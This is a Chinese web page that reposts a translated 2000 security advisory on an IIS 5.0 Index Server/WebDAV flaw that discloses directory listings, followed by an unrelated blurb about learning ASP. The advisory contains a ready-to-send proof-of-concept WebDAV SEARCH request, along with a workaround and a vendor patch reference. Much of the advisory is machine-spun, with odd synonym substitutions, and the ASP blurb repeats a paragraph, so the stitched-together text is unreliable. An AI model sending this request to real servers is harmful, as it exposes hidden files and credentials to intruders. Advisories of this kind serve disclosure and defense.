ASP网页设计在微软IIS 5.0泄露索引目次的毛病
asp可以轻松地实现对页面内容的动态控制,根据不同的浏览者,显示不同的页面内容。而浏览者一点觉察不出来,就像为他专门制作的页面一样。使用各种各样的组件,asp可以完成无比强大的功能。iis|索引|微软微软IIS5.0泄露索引目次的毛病公布日期:2000-10-6
更新日期:2000-10-6
受影响的体系:MicrosoftIIS5.0
+MicrosoftWindowsNT2000
形貌:
--------------------------------------------------------------------------------
假如IIS5.0中的IndexServer被同意的话,远程用户便可能观察全部根目次布局和一切子目次,这是由于WebDAV的查找完成中存在一个缺点。埋没目次、包括文件(*.inc)或别的在一般的网站界面中一样平常不克不及存取的文档就会因为这个毛病而泄露。
乐成天时用这个毛病便可能找到那些大概包括敏感信息如用户名和暗码的特定文件。
默许情形下IIS5.0中的IndexServer是被克制的,只要设置了“Index”属性的目次才会遭到这个毛病的影响。
<*DavidLitchfield<dlitchfield@atstake.com>*>
测试程序:
--------------------------------------------------------------------------------
警告
以下程序(办法)大概带有打击性,仅供平安研讨与教授教养之用。利用者风险自信!
发送以下的哀求给服务器:
SEARCH/HTTP/1.1
Host:target
Content-Type:text/xml
Content-Length:133
<?xmlversion="1.0"?>
<g:searchrequestxmlns:g="DAV:">
<g:sql>
Select"DAV:displayname"fromscope()
</g:sql>
</g:searchrequest>
--------------------------------------------------------------------------------
倡议:
一时办理举措:
NSFOCUS倡议您利用微软供应的办理计划:
假如您没有利用IndexServer(好比您的网站中没有必要查找的内容),克制或卸载该服务。大概将包括敏感信息的目次的“Indexthisresource”的选项克制。
厂商补钉:
微软已公布一篇常识库文章具体形貌了这个成绩的办理办法,能够在以下的地位找到这篇文章:
http://www.microsoft.com/technet/support/kb.asp?ID=272079
中联绿盟翻译收拾,未经允许,不得转载
接待会见我们的站点http://www.nsfocus.com/
中联绿盟给您平安的保证
</p>减少客户内IT专业人才缺乏带来的影响。ASP的客户员工利用浏览器进入相关的应用软件,简单易用,无需专业技术支持。 我们必须明确一个大方向,不要只是停留在因为学而去学,我们应有方向应有目标. 学习是为了用的,是为了让你的程序产生价值,把握住这个原则会比较轻松点。除此之外,课外时间一定要多参加一些社会实践活动,来锻炼自己的能力。 下面简单介绍一下我学习ASP的方法,希望对想学习ASP的朋友有所帮助... ASP的语言不仅仅只是命令格式差不多,而是包含在<%%>之内的命令完全就是VB语法。虽然ASP也是做为单独的一个技术来提出的,但他就是完全继承了VB所有的功能。 封装性使得代码逻辑清晰,易于管理,并且应用到ASP.Net上就可以使业务逻辑和Html页面分离,这样无论页面原型如何改变,业务逻辑代码都不必做任何改动;继承性和多态性使得代码的可重用性大大提高。 弱类型造成潜在的出错可能:尽管弱数据类型的编程语言使用起来回方便一些,但相对于它所造成的出错几率是远远得不偿失的。 封装性使得代码逻辑清晰,易于管理,并且应用到ASP.Net上就可以使业务逻辑和Html页面分离,这样无论页面原型如何改变,业务逻辑代码都不必做任何改动;继承性和多态性使得代码的可重用性大大提高。
页:
[1]